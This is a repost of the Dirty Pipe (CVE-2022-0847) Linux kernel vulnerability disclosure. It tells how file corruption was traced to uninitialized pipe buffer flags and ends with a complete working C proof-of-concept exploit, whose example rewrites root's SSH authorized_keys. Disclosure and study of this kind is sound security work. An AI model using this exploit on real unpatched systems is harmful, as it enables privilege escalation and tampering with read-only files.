The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation

admin 2022年3月8日17:09:29The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation已关闭评论54 views字数 18116阅读60分23秒阅读模式

Max Kellermann <max.kellermann@ionos.com>

Abstract

This is the story of CVE-2022-0847, a vulnerability in the Linux
kernel since 5.8 which allows overwriting data in arbitrary read-only
files. This leads to privilege escalation because unprivileged
processes can inject code into root processes.

It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.

The vulnerability was fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.

Corruption pt. I

It all started a year ago with a support ticket about corrupt files.
A customer complained that the access logs they downloaded could not
be decompressed. And indeed, there was a corrupt log file on one of
the log servers; it could be decompressed, but gzip reported a CRC
error. I could not explain why it was corrupt, but I assumed the
nightly split process had crashed and left a corrupt file behind. I
fixed the file’s CRC manually, closed the ticket, and soon forgot
about the problem.

Months later, this happened again and yet again. Every time, the
file’s contents looked correct, only the CRC at the end of the file
was wrong. Now, with several corrupt files, I was able to dig deeper
and found a surprising kind of corruption. A pattern emerged.

Access Logging

Let me briefly introduce how our log server works: In the CM4all
hosting environment, all web servers (running our custom open source
HTTP server
) send UDP
multicast datagrams with metadata about each HTTP request. These are
received by the log servers running Pond, our custom open source in-memory
database. A nightly job splits all access logs of the previous day
into one per hosted web site, each compressed with zlib.

Via HTTP, all access logs of a month can be downloaded as a single
.gz file. Using a trick (which involves Z_SYNC_FLUSH), we can
just concatenate all gzipped daily log files without having to
decompress and recompress them, which means this HTTP request consumes
nearly no CPU. Memory bandwidth is saved by employing the
splice() system call to feed data directly from the hard disk into
the HTTP connection, without passing the kernel/userspace boundary
(“zero-copy”).

Windows users can’t handle .gz files, but everybody can extract
ZIP files. A ZIP file is just a container for .gz files, so we
could use the same method to generate ZIP files on-the-fly; all we
needed to do was send a ZIP header first, then concatenate all .gz
file contents as usual, followed by the central directory (another
kind of header).

Corruption pt. II

This is how a the end of a proper daily file looks:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 9c 12 0b f5 f7 4a  00 00

The 00 00 ff ff is the sync flush which allows
simple concatenation. 03 00 is an empty “final” block, and is
followed by a CRC32 (0xf50b129c) and the uncompressed file length
(0x00004af7 = 19191 bytes).

The same file but corrupted:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 50 4b 01 02 1e 03  14 00

The sync flush is there, the empty final block is there, but the
uncompressed length is now 0x0014031e = 1.3 MB (that’s wrong, it’s
the same 19 kB file as above). The CRC32 is 0x02014b50, which
does not match the file contents. Why? Is this an out-of-bounds
write or a heap corruption bug in our log client?

I compared all known-corrupt files and discovered, to my surprise,
that all of them had the same CRC32 and the same “file length” value.
Always the same CRC - this implies that this cannot be the result of a
CRC calculation. With corrupt data, we would see different (but
wrong) CRC values. For hours, I stared holes into the code but could
not find an explanation.

Then I stared at these 8 bytes. Eventually, I realized that 50 4b
is ASCII for “P” and “K”. “PK”, that’s how all ZIP headers start.
Let’s have a look at these 8 bytes again:

  • 50 4b is “PK”

  • 01 02 is the code for central directory file header.

  • “Version made by” = 1e 03; 0x1e = 30 (3.0); 0x03 = UNIX

  • “Version needed to extract” = 14 00; 0x0014 = 20 (2.0)

The rest is missing; the header was apparently truncated after 8
bytes.

This is really the beginning of a ZIP central directory file header,
this cannot be a coincidence. But the process which writes these
files has no code to generate such header. In my desperation, I looked
at the zlib source code and all other libraries used by that process
but found nothing. This piece of software doesn’t know anything about
“PK” headers.

There is one process which generates “PK” headers, though; it’s the
web service which constructs ZIP files on-the-fly. But this process
runs as a different user which doesn’t have write permissions on these
files. It cannot possibly be that process.

None of this made sense, but new support tickets kept coming in (at a
very slow rate). There was some systematic problem, but I just
couldn’t get a grip on it. That gave me a lot of frustration, but
I was busy with other tasks, and I kept pushing this file corruption
problem to the back of my queue.

Corruption pt. III

External pressure brought this problem back into my consciousness. I
scanned the whole hard disk for corrupt files (which took two days),
hoping for more patterns to emerge. And indeed, there was a pattern:

  • there were 37 corrupt files within the past 3 months

  • they occurred on 22 unique days

  • 18 of those days have 1 corruption

  • 1 day has 2 corruptions (2021-11-21)

  • 1 day has 7 corruptions (2021-11-30)

  • 1 day has 6 corruptions (2021-12-31)

  • 1 day has 4 corruptions (2022-01-31)

The last day of each month is clearly the one which most corruptions
occur.

Only the primary log server had corruptions (the one which served HTTP
connections and constructed ZIP files). The standby server (HTTP
inactive but same log extraction process) had zero corruptions. Data
on both servers was identical, minus those corruptions.

Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic
rays? No, the symptoms don’t look like a hardware issue. A ghost in
the machine? Do we need an exorcist?

Man staring at code

I began staring holes into my code again, this time the web service.

Remember, the web service writes a ZIP header, then uses splice()
to send all compressed files, and finally uses write() again for
the “central directory file header”, which begins with 50 4b 01 02
1e 03 14 00
, exactly the corruption. The data sent over the wire
looks exactly like the corrupt files on disk. But the process sending
this on the wire has no write permissions on those files (and doesn’t
even try to do so), it only reads them. Against all odds and against
the impossible, it must be that process which causes corruptions,
but how?

My first flash of inspiration why it’s always the last day of the
month which gets corrupted. When a website owner downloads the access
log, the server starts with the first day of the month, then the
second day, and so on. Of course, the last day of the month is
sent at the end; the last day of the month is always followed by the
“PK” header. That’s why it’s more likely to corrupt the last day.
(The other days can be corrupted if the requested month is not yet
over, but that’s less likely.)

How?

Man staring at kernel code

After being stuck for more hours, after eliminating everything that
was definitely impossible (in my opinion), I drew a conclusion: this
must be a kernel bug.

Blaming the Linux kernel (i.e. somebody else’s code) for data
corruption must be the last resort. That is unlikely. The kernel is
an extremely complex project developed by thousands of individuals
with methods that may seem chaotic; despite of this, it is extremely
stable and reliable. But this time, I was convinced that it must be a
kernel bug.

In a moment of extraordinary clarity, I hacked two C programs.

One that keeps writing odd chunks of the string “AAAAA” to a file
(simulating the log splitter):

#include <unistd.h>
int main(int argc, char **argv) {
  for (;;) write(1, "AAAAA", 5);
}
// ./writer >foo

And one that keeps transferring data from that file to a pipe using
splice() and then writes the string “BBBBB” to the pipe
(simulating the ZIP generator):

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
  }
}
// ./splicer <foo |cat >/dev/null

I copied those two programs to the log server, and… bingo! The
string “BBBBB” started appearing in the file, even though nobody ever
wrote this string to the file (only to the pipe by a process without
write permissions).

So this really is a kernel bug!

All bugs become shallow once they can be reproduced. A quick check
verified that this bug affects Linux 5.10 (Debian Bullseye) but not
Linux 4.19 (Debian Buster). There are 185.011 git commits between
v4.19 and v5.10, but thanks to git bisect, it takes just 17 steps
to locate the faulty commit.

The bisect arrived at commit f6dd975583bd,
which refactors the pipe buffer code for anonymous pipe buffers. It
changes the way how the “mergeable” check is done for pipes.

Pipes and Buffers and Pages

Why pipes, anyway? In our setup, the web service which generates ZIP
files communicates with the web server over pipes; it talks the Web
Application Socket
protocol
which we invented because we were not happy with CGI, FastCGI and AJP.
Using pipes instead of multiplexing over a socket (like FastCGI and
AJP do) has a major advantage: you can use splice() in both the
application and the web server for maximum efficiency. This reduces
the overhead for having web applications out-of-process (as opposed
to running web services inside the web server process, like Apache
modules do). This allows privilege separation without sacrificing
(much) performance.

Short detour on Linux memory management:
The smallest unit of memory managed by the CPU is a page (usually
4 kB). Everything in the lowest layer of Linux’s memory management is
about pages. If an application requests memory from the kernel, it
will get a number of (anonymous) pages. All file I/O is also about
pages: if you read data from a file, the kernel first copies a number
of 4 kB chunks from the hard disk into kernel memory, managed by a
subsystem called the page cache. From there, the data will be
copied to userspace. The copy in the page cache remains for some
time, where it can be used again, avoiding unnecessary hard disk I/O,
until the kernel decides it has a better use for that memory
(“reclaim”). Instead of copying file data to userspace memory, pages
managed by the page cache can be mapped directly into userspace using
the mmap() system call (a trade-off for reduced memory bandwidth
at the cost of increased page faults and TLB flushes). The Linux
kernel has more tricks: the sendfile() system call allows an
application to send file contents into a socket without a roundtrip to
userspace (an optimization popular in web servers serving static files
over HTTP). The splice() system call is kind of a generalization
of sendfile(): It allows the same optimization if either side of
the transfer is a pipe; the other side can be almost anything
(another pipe, a file, a socket, a block device, a character device).
The kernel implements this by passing page references around, not
actually copying anything (zero-copy).

A pipe is a tool for unidirectional inter-process communication.
One end is for pushing data into it, the other end can pull that data.
The Linux kernel implements this by a ring
of struct pipe_buffer,
each referring to a page. The first write to a pipe allocates a
page (space for 4 kB worth of data). If the most recent write does
not fill the page completely, a following write may append to that
existing page instead of allocating a new one. This is how
“anonymous” pipe buffers work (anon_pipe_buf_ops).

If you, however, splice() data from a file into the pipe, the
kernel will first load the data into the page cache. Then it will
create a struct pipe_buffer pointing inside the page cache
(zero-copy), but unlike anonymous pipe buffers, additional data
written to the pipe must not be appended to such a page because the
page is owned by the page cache, not by the pipe.

History of the check for whether new data can be appended to an
existing pipe buffer:

Over the years, this check was refactored back and forth, which was
okay. Or was it?

Uninitialized

Several years before PIPE_BUF_FLAG_CAN_MERGE was born, commit
241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016)

added two new functions which allocate a new struct pipe_buffer,
but initialization of its flags member was missing. It was now
possible to create page cache references with arbitrary flags, but
that did not matter. It was technically a bug, though without
consequences at that time because all of the existing flags were
rather boring.

This bug suddenly became critical in Linux 5.8 with commit
f6dd975583bd “pipe: merge anon_pipe_buf*_ops”
.
By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference,
it became possible to overwrite data in the page cache, simply by
writing new data into the pipe prepared in a special way.

Corruption pt. IV

This explains the file corruption: First, some data gets written into
the pipe, then lots of files get spliced, creating page cache
references. Randomly, those may or may not have
PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the write() call
that writes the central directory file header will be written to the
page cache of the last compressed file.

But why only the first 8 bytes of that header? Actually, all of the
header gets copied to the page cache, but this operation does not
increase the file size. The original file had only 8 bytes of
“unspliced” space at the end, and only those bytes can be overwritten.
The rest of the page is unused from the page cache’s perspective
(though the pipe buffer code does use it because it has its own page
fill management).

And why does this not happen more often? Because the page cache does
not write back to disk unless it believes the page is “dirty”.
Accidently overwriting data in the page cache will not make the page
dirty”. If no other process happens to “dirty” the file, this change
will be ephemeral; after the next reboot (or after the kernel decides
to drop the page from the cache, e.g. reclaim under memory pressure),
the change is reverted. This allows interesting attacks without
leaving a trace on hard disk.

Exploiting

In my first exploit (the “writer” / “splicer” programs which I used
for the bisect), I had assumed that this bug is only exploitable while
a privileged process writes the file, and that it depends on timing.

When I realized what the real problem was, I was able to widen the
hole by a large margin: it is possible to overwrite the page cache
even in the absence of writers, with no timing constraints, at
(almost) arbitrary positions with arbitrary data. The limitations
are:

  • the attacker must have read permissions (because it needs to
    splice() a page into a pipe)

  • the offset must not be on a page boundary (because at least one byte
    of that page must have been spliced into the pipe)

  • the write cannot cross a page boundary (because a new anonymous
    buffer would be created for the rest)

  • the file cannot be resized (because the pipe has its own page fill
    management and does not tell the page cache how much data has been
    appended)

To exploit this vulnerability, you need to:

  1. Create a pipe.

  2. Fill the pipe with arbitrary data (to set the
    PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).

  3. Drain the pipe (leaving the flag set in all struct pipe_buffer
    instances on the struct pipe_inode_info ring).

  4. Splice data from the target file (opened with O_RDONLY) into
    the pipe from just before the target offset.

  5. Write arbitrary data into the pipe; this data will overwrite the
    cached file page instead of creating a new anomyous struct
    pipe_buffer
    because PIPE_BUF_FLAG_CAN_MERGE is set.

To make this vulnerability more interesting, it not only works without
write permissions, it also works with immutable files, on read-only
btrfs snapshots and on read-only mounts (including CD-ROM mounts).
That is because the page cache is always writable (by the kernel), and
writing to a pipe never checks any permissions.

This is my proof-of-concept exploit:

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <[email protected]>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

Timeline

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月8日17:09:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentationhttp://cn-sec.com/archives/821113.html